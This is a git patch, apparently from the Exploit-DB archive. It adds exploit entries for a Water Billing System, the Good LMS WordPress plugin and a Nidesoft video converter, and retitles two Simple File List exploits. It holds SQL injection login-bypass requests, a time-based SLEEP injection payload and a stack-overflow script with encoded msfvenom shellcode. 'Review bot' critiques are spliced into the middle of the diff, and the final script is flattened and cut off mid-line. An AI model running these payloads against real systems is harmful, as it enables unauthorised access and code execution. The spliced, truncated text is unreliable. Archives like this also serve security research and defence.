From ccc8fe23315dfdd408fb4153c0693c3a2ead4432 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 13 Nov 2020 05:01:58 +0000
Subject: [PATCH] DB: 2020-11-13

7 changes to exploits/shellcodes

Nidesoft 3GP Video Converter 2.6.18 - Local Stack Buffer Overflow
WordPress Plugin Simple File List 5.4 - Arbitrary File Upload
WordPress Plugin Simple File List 4.2.2 - Arbitrary File Upload
Water Billing System 1.0 - 'username' and 'password' parameters SQL Injection
Wordpress Plugin Good LMS 2.1.4 - 'id' Unauthenticated SQL Injection
WordPress Plugin Simple File List 5.4 - Remote Code Execution
WordPress Plugin Simple File List 4.2.2 - Remote Code Execution
---
 exploits/php/webapps/{48349.py => 48449.py} | 6 +-
 exploits/php/webapps/48979.py | 2 +-
 exploits/php/webapps/49032.txt | 71 +++++++++++++++++++++
 exploits/php/webapps/49033.txt | 71 +++++++++++++++++++++
 exploits/windows/local/49034.py | 65 +++++++++++++++++++
 files_exploits.csv | 7 +-
 6 files changed, 216 insertions(+), 6 deletions(-)
 rename exploits/php/webapps/{48349.py => 48449.py} (92%)
 create mode 100644 exploits/php/webapps/49032.txt
 create mode 100644 exploits/php/webapps/49033.txt
 create mode 100755 exploits/windows/local/49034.py

diff --git a/exploits/php/webapps/48349.py b/exploits/php/webapps/48449.py
similarity index 92%
rename from exploits/php/webapps/48349.py
rename to exploits/php/webapps/48449.py
index 97aa87f96..853ea5da2 100755
--- a/exploits/php/webapps/48349.py
+++ b/exploits/php/webapps/48449.py
@@ -1,9 +1,9 @@
-# Exploit Title: Wordpress Plugin Simple File List 5.4 - Remote Code Execution
-# Date: 2020-04-2019
+# Exploit Title: Wordpress Plugin Simple File List 4.2.2 - Remote Code Execution
+# Date: 2020-04-19
 # Exploit Author: coiffeur
 # Vendor Homepage: https://simplefilelist.com/
 # Software Link: https://wordpress.org/plugins/simple-file-list/
-# Version: Wordpress v5.4 Simple File List v4.2.2
+# Version: Wordpress Simple File List <= v4.2.2
 
 import requests
 import random
diff --git a/exploits/php/webapps/48979.py b/exploits/php/webapps/48979.py
index 6381bf6f5..2b4e7b214 100755
--- a/exploits/php/webapps/48979.py
+++ b/exploits/php/webapps/48979.py
@@ -1,6 +1,6 @@
 #!/usr/bin/python
 # -*- coding: utf-8 -*-
-# Exploit Title: Wordpress Plugin Simple File List 5.4 - Arbitrary File Upload
+# Exploit Title: Wordpress Plugin Simple File List 4.2.2 - Arbitrary File Upload
 # Date: 2020-11-01
 # Exploit Author: H4rk3nz0 based off exploit by coiffeur
 # Original Exploit: https://www.exploit-db.com/exploits/48349
diff --git a/exploits/php/webapps/49032.txt b/exploits/php/webapps/49032.txt
new file mode 100644
index 000000000..19a8f14f7
--- /dev/null
+++ b/exploits/php/webapps/49032.txt
@@ -0,0 +1,71 @@
+# Exploit Title: Water Billing System 1.0 - 'username' and 'password' parameters SQL Injection
+# SQL Injection in 'username' and 'password' parameters allows attacker to run the SQL commands on the victim to extract entire DB. In advanced exploitation, an attacker can run the arbitrary code on the victim system to compromise it...
+# Exploit Author: Sarang Tumne (CyberInsane)
+# Date: 4th Nov, 2020
+# Confirmed on release 1.0
+# Tested on: Windows Server 2016- XAMPP
+# Vendor: https://www.sourcecodester.com/php/14560/water-billing-system-phpmysqli-full-source-code.html
+###############################################
+
+POST /wbs/process.php HTTP/1.1
+Host: 192.168.56.102:8080
+Content-Length: 45
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://192.168.56.102:8080
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://192.168.56.102:8080/wbs/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+username='%20or%200%3d0%20#&password=password
+
+Response:
+
+HTTP/1.1 200 OK
+Date: Mon, 02 Nov 2020 04:30:51 GMT
+Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.30
+X-Powered-By: PHP/7.2.30
+Set-Cookie: PHPSESSID=4q8t10sshr36he7sl19hb563a0; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 48
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
+=========================================================================
+POST /wbs/process.php HTTP/1.1
+Host: 192.168.56.102:8080
+Content-Length: 48
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://192.168.56.102:8080
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://192.168.56.102:8080/wbs/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+username=admin&password=a'%20or%20'a'%20%3d%20'a
+
+Response:
+HTTP/1.1 200 OK
+Date: Mon, 02 Nov 2020 04:30:49 GMT
+Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.30
+X-Powered-By: PHP/7.2.30
+Set-Cookie: PHPSESSID=34a478h4bhtliatg8l71kmp10r; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 48
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/49033.txt b/exploits/php/webapps/49033.txt
new file mode 100644
index 000000000..a1c8af3f4
--- /dev/null
+++ b/exploits/php/webapps/49033.txt
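Review bot: Both captured responses stop at the headers (`Content-Length: 48`, body omitted), so nothing in the file shows what a successful bypass looks like as opposed to a failed login, and neither the `username='%20or%200%3d0%20#` request nor the `password=a'%20or%20'a'%20%3d%20'a` request can be verified as evidence from what is written. Include the 48-byte response body, or whatever the application emits on success (a redirect to the dashboard, a logged-in session marker), for the injected request and for a control request with wrong credentials so the difference is visible. The opening sentence's claim that "an attacker can run the arbitrary code on the victim system" is not supported by anything in the file; unless a write path such as `INTO OUTFILE` was actually demonstrated, rephrase it as a possibility or drop it. It is also worth stating that the `#` terminator in the first payload is MySQL-specific, which matches the XAMPP target but will not carry over to other backends.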
@@ -0,0 +1,71 @@
+# Exploit Title: Wordpress Plugin Good LMS 2.1.4 - 'id' Unauthenticated SQL Injection
+# Software Link: https://codecanyon.net/item/good-lms-learning-management-system-wp-plugin/9033850
+# Version: <= 2.1.4
+# Dork: N/A
+# Author: Abdulazeez Alaseeri
+# Tested on: linux/apache
+# Type: Web App
+# Date: 2020-11-12
+# Category: Web App
+
+
+================================================================
+Unauthenticated SQL Injection in Good Layers LMS Plugin <= 2.1.4
+================================================================
+
+Plugin URL: https://codecanyon.net/item/good-lms-learning-management-system-wp-plugin/9033850
+
+Following is the vulnerable code in file "goodlayers-lms/include/lightbox-form.php" from line 682 to 701
+================================================================
+Start Vulnerable Code
+================================================================
+682- add_action( 'wp_ajax_gdlr_lms_cancel_booking', 'gdlr_lms_cancel_booking' );
+683- add_action( 'wp_ajax_nopriv_gdlr_lms_cancel_booking', 'gdlr_lms_cancel_booking' );
+684- function gdlr_lms_cancel_booking(){
+685- global $wpdb;
+686-
+687- $sql = 'SELECT * FROM ' . $wpdb->prefix . 'gdlrpayment ';
+688- $sql .= 'WHERE id=' . $_POST['id'] . ' AND ';
+689- $sql .= '(payment_status=\'pending\' OR payment_status=\'submitted\' OR payment_status=\'reserved\')';
+690- $booked_course = $wpdb->get_row($sql);
+691- if( !empty($booked_course) ){
+692- $payment_info = unserialize($booked_course->payment_info);
+693-
+694- $course_options = gdlr_lms_get_course_options($booked_course->course_id);
+695- $course_options['booked-seat'] = intval($course_options['booked-seat']) - intval($payment_info['amount']);
+696- update_post_meta($booked_course->course_id, 'gdlr-lms-course-settings', wp_slash(json_encode($course_options, JSON_UNESCAPED_UNICODE)));
+697-
+698- $wpdb->delete( $wpdb->prefix . 'gdlrpayment', array('id'=>$_POST['id']), array('%d'));
+699- }
+700- die("");
+701- }
+================================================================
+End Vulnerable Code
+================================================================
+Line 682 means that function "gdlr_lms_cancel_booking" can be called using "/wp-admin/admin-ajax.php" by having any low privileged account such as subscriber or contributor. However the "nopriv" in line 683 means that the same function "gdlr_lms_cancel_booking" can also be called as an unauthenticated user. Following URL means that an attacker is already inside function "gdlr_lms_cancel_booking".
+
+http://www.example.com/wp-admin/admin-ajax.php?action=gdlr_lms_cancel_booking
+
+SQL Injection on line 688 is pretty simple to understand that an arbitrary user input in POST Request is sent straight into the MySQL Query as variable "id"
+
+$sql .= 'WHERE id=' . $_POST['id'] . ' AND ';
+
+Following are the Request Headers as POC which demonstrates MySQL SLEEP Query.
+
+================================================================
+Request Headers Start
+================================================================
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: example.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+
+action=gdlr_lms_cancel_booking&id=(SELECT 1337 FROM (SELECT(SLEEP(10)))MrMV)
+================================================================
+Request Headers Finish
+================================================================
\ No newline at end of file
diff --git a/exploits/windows/local/49034.py b/exploits/windows/local/49034.py
new file mode 100755
index 000000000..9f03d7785
--- /dev/null
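Review bot: The write-up stops at the unsanitized `id` on line 688, but the quoted function also performs no capability, nonce or ownership check at all, so with the `nopriv` hook on line 683 any unauthenticated client who supplies the integer id of a booking in `pending`, `submitted` or `reserved` state gets that row deleted on line 698 and the course's `booked-seat` count decremented on lines 695–696; fixing only the query leaves an unauthenticated booking-cancellation bug behind. Also worth a sentence: the row returned by the injected `SELECT` on line 690 is fed to `unserialize()` on line 692, so if a UNION-based injection is possible against this query an attacker can presumably control the serialized `payment_info` value as well, which is a PHP object-injection vector whose real impact depends on what classes the install loads — state it as a possibility, not a result. The advisory would be more useful to defenders with the one-line fix for 688, `$sql = $wpdb->prepare( 'SELECT * FROM ' . $wpdb->prefix . 'gdlrpayment WHERE id=%d AND ...', $_POST['id'] );`, together with a recommendation to remove the `nopriv` registration or verify that the caller owns the booking before cancelling it.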
+++ b/exploits/windows/local/49034.py 
@@ -0,0 +1,65 @@ +# Exploit Title: Nidesoft 3GP Video Converter 2.6.18 - Local Stack Buffer Overflow +# Date: 2020-07-30 +# Author: Felipe Winsnes +# Software Link: http://www.nidesoft.com/downloads/3gp-video-converter.exe +# Version: 2.6.18 +# Tested on: Windows 7 (x86) + +# Blog: https://whitecr0wz.github.io/ + +# Proof of Concept: +# 1.- Run the python script, it will create the file "poc.txt". +# 2.- Copy the content of the new file "poc.txt" to clipboard. +# 3.- Open the application. +# 4.- Paste the clipboard into the "License Code" parameter within registration. +# 5.- Profit. + +import struct + +# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread +# Payload size: 448 bytes + +buf = b"" +buf += b"\x89\xe3\xdb\xd3\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49" +buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" +buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" +buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" +buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x48\x68\x6d" +buf += b"\x52\x43\x30\x57\x70\x33\x30\x65\x30\x6c\x49\x78\x65" +buf += b"\x70\x31\x6f\x30\x51\x74\x6e\x6b\x50\x50\x34\x70\x6c" +buf += b"\x4b\x73\x62\x76\x6c\x4c\x4b\x52\x72\x45\x44\x6e\x6b" +buf += b"\x44\x32\x71\x38\x56\x6f\x6e\x57\x32\x6a\x31\x36\x55" +buf += b"\x61\x49\x6f\x6e\x4c\x45\x6c\x30\x61\x61\x6c\x53\x32" +buf += b"\x54\x6c\x47\x50\x6a\x61\x78\x4f\x74\x4d\x53\x31\x69" +buf += b"\x57\x6a\x42\x4b\x42\x43\x62\x53\x67\x6c\x4b\x50\x52" +buf += b"\x52\x30\x6c\x4b\x50\x4a\x55\x6c\x4e\x6b\x42\x6c\x36" +buf += b"\x71\x44\x38\x5a\x43\x30\x48\x73\x31\x6a\x71\x63\x61" +buf += b"\x6e\x6b\x56\x39\x35\x70\x37\x71\x68\x53\x4c\x4b\x71" +buf += b"\x59\x35\x48\x58\x63\x74\x7a\x32\x69\x4c\x4b\x65\x64" +buf += b"\x4c\x4b\x77\x71\x4a\x76\x65\x61\x79\x6f\x4e\x4c\x4b" +buf += b"\x71\x48\x4f\x46\x6d\x67\x71\x78\x47\x37\x48\x39\x70" +buf += b"\x72\x55\x39\x66\x45\x53\x61\x6d\x38\x78\x37\x4b\x73" +buf += 
b"\x4d\x77\x54\x32\x55\x6d\x34\x63\x68\x6e\x6b\x30\x58" +buf += b"\x45\x74\x65\x51\x6e\x33\x51\x76\x6c\x4b\x64\x4c\x72" +buf += b"\x6b\x6c\x4b\x63\x68\x67\x6c\x47\x71\x4b\x63\x6c\x4b" +buf += b"\x43\x34\x6e\x6b\x77\x71\x7a\x70\x4d\x59\x73\x74\x47" +buf += b"\x54\x74\x64\x53\x6b\x51\x4b\x61\x71\x51\x49\x30\x5a" +buf += b"\x73\x61\x6b\x4f\x79\x70\x61\x4f\x43\x6f\x70\x5a\x4c" +buf += b"\x4b\x77\x62\x5a\x4b\x4e\x6d\x71\x4d\x72\x4a\x53\x31" +buf += b"\x4e\x6d\x4c\x45\x6c\x72\x33\x30\x65\x50\x37\x70\x76" +buf += b"\x30\x51\x78\x76\x51\x4e\x6b\x32\x4f\x6e\x67\x59\x6f" +buf += b"\x58\x55\x6f\x4b\x49\x70\x77\x6d\x47\x5a\x75\x5a\x72" +buf += b"\x48\x4d\x76\x6c\x55\x4f\x4d\x6f\x6d\x69\x6f\x49\x45" +buf += b"\x57\x4c\x63\x36\x43\x4c\x54\x4a\x4f\x70\x79\x6b\x39" +buf += b"\x70\x64\x35\x43\x35\x6f\x4b\x37\x37\x64\x53\x72\x52" +buf += b"\x52\x4f\x61\x7a\x45\x50\x63\x63\x79\x6f\x6b\x65\x35" +buf += b"\x33\x63\x51\x32\x4c\x61\x73\x54\x6e\x75\x35\x72\x58" +buf += b"\x43\x55\x63\x30\x41\x41" + +jmpesp = struct.pack("